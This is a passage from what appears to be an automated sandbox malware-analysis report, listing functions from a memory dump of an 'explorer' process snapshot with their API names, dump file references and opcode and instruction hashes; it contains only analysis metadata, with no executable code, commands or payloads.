                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$CallerLibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 3311809864-0
                                                                                                            • Opcode ID: 29f24ca8af7b1ec7b39b311e50dcf5f0945885a2f14febe62e27be05c9337b80
                                                                                                            • Instruction ID: 57cc68c922f2137fa51aad663c1dce808f37531c0e7a553a47cceefc2bd2b60d
                                                                                                            • Opcode Fuzzy Hash: 29f24ca8af7b1ec7b39b311e50dcf5f0945885a2f14febe62e27be05c9337b80
                                                                                                            • Instruction Fuzzy Hash: E7019036618BC58ADA70CB04E4D43AAB364F3D6744F801516D68E93A68DF39C589CB41
                                                                                                            Function 00E178A0 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2422867632-0
                                                                                                            • Opcode ID: 972676e2263dc913d8f0aceba4ed3926a994122b1158fd80d1085a60b805af4a
                                                                                                            • Instruction ID: 8192b5692cd65de3ce841438c33c8e8030648610f048ab3a836019616b23533f
                                                                                                            • Opcode Fuzzy Hash: 972676e2263dc913d8f0aceba4ed3926a994122b1158fd80d1085a60b805af4a
                                                                                                            • Instruction Fuzzy Hash: 8EF0ED31608B9186F764DB24F9097DA27B0F364748F506B26C48966260CF7DC5C9C601
                                                                                                            Function 00E05230 Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2422867632-0
                                                                                                            • Opcode ID: 97899df86d47d9c0d290823c76a79fd567d6de1076d23b08f7a01fa9945c199d
                                                                                                            • Instruction ID: 3f86c8e836d11f2cd1602652ffe6a07baefc2cb201b03cc7f442c4ce76b4db0c
                                                                                                            • Opcode Fuzzy Hash: 97899df86d47d9c0d290823c76a79fd567d6de1076d23b08f7a01fa9945c199d
                                                                                                            • Instruction Fuzzy Hash: A1F04832D05B81C6F720DBA1F95836326B1E774398F902915D445A66B4CFBD85C4CF44
                                                                                                            Function 00E1C130 Relevance: 1.5, APIs: 1, Instructions: 17threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2422867632-0
                                                                                                            • Opcode ID: 7bf3fda03488cde0f2424b2de49cc3ea02773bfd36645c5761c3d60d64d8c9f6
                                                                                                            • Instruction ID: f97c7641bd65921278268941db110e03733ad2583f9b93635244692219efdc6c
                                                                                                            • Opcode Fuzzy Hash: 7bf3fda03488cde0f2424b2de49cc3ea02773bfd36645c5761c3d60d64d8c9f6
                                                                                                            • Instruction Fuzzy Hash: 12E0B631685B80E2E724DB20FD197C637B4F3A9388F904925D44DA2672DF7DC2D9CA00
                                                                                                            Function 00E250EE Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: bd26352a9cb9f43418d3adb89ed1a2b75b0174cf7063cae51a4f923cf6a2674f
                                                                                                            • Instruction ID: 06aeae9a39abddd7ac0661cee82a5b791cce952dc1d85676c5b75ba0ce46d62d
                                                                                                            • Opcode Fuzzy Hash: bd26352a9cb9f43418d3adb89ed1a2b75b0174cf7063cae51a4f923cf6a2674f
                                                                                                            • Instruction Fuzzy Hash: B6D01733629E90CAE6708B05FA44BAAB360F7C0704F506011A6C292908CB38C890CE00
                                                                                                            Function 00E2505D Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: b1b7b2e2055f6fa1aef4303f3cbb07f62001011ee5cc0c0af255673b558dbb32
                                                                                                            • Instruction ID: 06aeae9a39abddd7ac0661cee82a5b791cce952dc1d85676c5b75ba0ce46d62d
                                                                                                            • Opcode Fuzzy Hash: b1b7b2e2055f6fa1aef4303f3cbb07f62001011ee5cc0c0af255673b558dbb32
                                                                                                            • Instruction Fuzzy Hash: B6D01733629E90CAE6708B05FA44BAAB360F7C0704F506011A6C292908CB38C890CE00
                                                                                                            Function 00E2503A Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 67bbd1482953c9a039683a81b8c0d8f6b38603526629be0e265f0fd7566734f5
                                                                                                            • Instruction ID: 06aeae9a39abddd7ac0661cee82a5b791cce952dc1d85676c5b75ba0ce46d62d
                                                                                                            • Opcode Fuzzy Hash: 67bbd1482953c9a039683a81b8c0d8f6b38603526629be0e265f0fd7566734f5
                                                                                                            • Instruction Fuzzy Hash: B6D01733629E90CAE6708B05FA44BAAB360F7C0704F506011A6C292908CB38C890CE00
                                                                                                            Function 00E249EF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 48b5383b38cba486ddfa990dbca9aa2bd6a836a40005c426cf510de7b801e9cc
                                                                                                            • Instruction ID: 2c597c75e68a2e12bdbd147ac25d29dfe90b5bd66ec20352aed8254f52eebad0
                                                                                                            • Opcode Fuzzy Hash: 48b5383b38cba486ddfa990dbca9aa2bd6a836a40005c426cf510de7b801e9cc
                                                                                                            • Instruction Fuzzy Hash: 20D01772619690C7E7748B08F041BAAB360F780744F402021A286A2994CF39D980CE00
                                                                                                            Function 00E249DB Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 46766f59590c43c0cb273360e60c28dcd038db0768a1794d386c2c23107aae88
                                                                                                            • Instruction ID: 2c597c75e68a2e12bdbd147ac25d29dfe90b5bd66ec20352aed8254f52eebad0
                                                                                                            • Opcode Fuzzy Hash: 46766f59590c43c0cb273360e60c28dcd038db0768a1794d386c2c23107aae88
                                                                                                            • Instruction Fuzzy Hash: 20D01772619690C7E7748B08F041BAAB360F780744F402021A286A2994CF39D980CE00
                                                                                                            Function 00E2516B Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: fabb388cd174b4009692af883b9a74474a6733f7c92937f47ce5757885f3fb1c
                                                                                                            • Instruction ID: 06aeae9a39abddd7ac0661cee82a5b791cce952dc1d85676c5b75ba0ce46d62d
                                                                                                            • Opcode Fuzzy Hash: fabb388cd174b4009692af883b9a74474a6733f7c92937f47ce5757885f3fb1c
                                                                                                            • Instruction Fuzzy Hash: B6D01733629E90CAE6708B05FA44BAAB360F7C0704F506011A6C292908CB38C890CE00
                                                                                                            Function 00E25123 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: c334c5a706d2358cffd21ca2a89902cb0897f7236b5e31b31bde773446387451
                                                                                                            • Instruction ID: 06aeae9a39abddd7ac0661cee82a5b791cce952dc1d85676c5b75ba0ce46d62d
                                                                                                            • Opcode Fuzzy Hash: c334c5a706d2358cffd21ca2a89902cb0897f7236b5e31b31bde773446387451
                                                                                                            • Instruction Fuzzy Hash: B6D01733629E90CAE6708B05FA44BAAB360F7C0704F506011A6C292908CB38C890CE00
                                                                                                            Function 00E2491C Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 3a1423a10d6c23ad0d70ca8df7085a05a4326c9adc261c3d6554e918dcf8160a
                                                                                                            • Instruction ID: 2c597c75e68a2e12bdbd147ac25d29dfe90b5bd66ec20352aed8254f52eebad0
                                                                                                            • Opcode Fuzzy Hash: 3a1423a10d6c23ad0d70ca8df7085a05a4326c9adc261c3d6554e918dcf8160a
                                                                                                            • Instruction Fuzzy Hash: 20D01772619690C7E7748B08F041BAAB360F780744F402021A286A2994CF39D980CE00
                                                                                                            Function 00E24ABE Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 5cd527b682022ef2e181432df0d08e7952cbdf5ffb770021f4e618f9a49ae03e
                                                                                                            • Instruction ID: 2c597c75e68a2e12bdbd147ac25d29dfe90b5bd66ec20352aed8254f52eebad0
                                                                                                            • Opcode Fuzzy Hash: 5cd527b682022ef2e181432df0d08e7952cbdf5ffb770021f4e618f9a49ae03e
                                                                                                            • Instruction Fuzzy Hash: 20D01772619690C7E7748B08F041BAAB360F780744F402021A286A2994CF39D980CE00
                                                                                                            Function 00E24BF6 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: f9167c6025ceaf99fe249accd0e6505652e1a8aee71905078ff3a5cba5771e6b
                                                                                                            • Instruction ID: 2c597c75e68a2e12bdbd147ac25d29dfe90b5bd66ec20352aed8254f52eebad0
                                                                                                            • Opcode Fuzzy Hash: f9167c6025ceaf99fe249accd0e6505652e1a8aee71905078ff3a5cba5771e6b
                                                                                                            • Instruction Fuzzy Hash: 20D01772619690C7E7748B08F041BAAB360F780744F402021A286A2994CF39D980CE00
                                                                                                            Function 00E24BC1 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 066845098519c5cfd41540883547bc2673087f9916ed1057274385ce232eb9ba
                                                                                                            • Instruction ID: 2c597c75e68a2e12bdbd147ac25d29dfe90b5bd66ec20352aed8254f52eebad0
                                                                                                            • Opcode Fuzzy Hash: 066845098519c5cfd41540883547bc2673087f9916ed1057274385ce232eb9ba
                                                                                                            • Instruction Fuzzy Hash: 20D01772619690C7E7748B08F041BAAB360F780744F402021A286A2994CF39D980CE00
                                                                                                            Function 00E24B30 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
